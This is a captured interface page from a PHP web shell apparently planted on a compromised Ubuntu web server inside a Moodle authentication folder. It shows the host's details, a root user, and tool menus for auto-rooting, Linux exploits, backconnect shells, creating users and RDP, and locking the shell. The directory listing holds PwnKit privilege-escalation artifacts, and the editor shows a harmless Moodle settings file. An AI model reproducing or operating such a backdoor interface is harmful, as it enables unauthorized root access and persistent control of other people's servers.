Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
auth /
email /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
auth.php
6.71
KB
-rwxrwxrwx
config.html
871
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
version.php
1.15
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.html
<!-- No config needed --> <?php // set to defaults if undefined if (!isset($config->recaptcha)) { $config->recaptcha = false; } $yesno = array( get_string('no'), get_string('yes') ); ?> <table cellspacing="0" cellpadding="5" border="0"> <tr> <td colspan="3"> <h2 class="main"><?php print_string('auth_emailsettings', 'auth_email') ?> </h2> </td> </tr> <tr> <td align="right"><label for="menurecaptcha"><?php print_string('auth_emailrecaptcha_key', 'auth_email') ?></label></td> <td><?php global $OUTPUT; echo html_writer::select($yesno, 'recaptcha', $config->recaptcha, false); ?></td> <td><?php print_string('auth_emailrecaptcha', 'auth_email') ?></td> </tr> <?php print_auth_lock_options($this->authtype, $user_fields, get_string('auth_fieldlocks_help', 'auth'), false, false); ?> </table>
Close